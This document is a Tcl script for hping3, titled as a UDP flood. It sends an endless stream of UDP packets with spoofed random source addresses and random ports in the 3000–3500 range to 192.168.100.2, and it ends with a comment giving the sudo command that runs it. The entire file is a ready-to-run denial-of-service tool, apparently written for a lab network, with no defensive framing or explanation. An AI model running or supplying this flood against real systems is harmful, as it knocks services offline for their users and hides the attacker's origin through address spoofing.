# Hping3 UDP Flood (random src/dst port between 3000–3500) with TCL script

set dst_ip "192.168.100.2"
set count 0

proc random_ip {} {
    return "[expr {int(rand()*256)}].[expr {int(rand()*256)}].[expr {int(rand()*256)}].[expr {int(rand()*256)}]"
}

# Function to generate random port in [3000,3500]
proc random_port {} {
    return [expr {int(rand()*501) + 3000}]
}

while {1} {
    set saddr [random_ip]
    set sport [random_port]
    set dport [random_port]
    set pkt "ip(saddr=$saddr,daddr=$dst_ip,ttl=64)+udp(sport=$sport,dport=$dport)"
    hping send $pkt
    incr count

    if {[expr {$count % 1000}] == 0} {
        puts "$count UDP packets sent so far..."
    }
}

# Comando: sudo hping3 exec udp-tcp_range_ports.htcl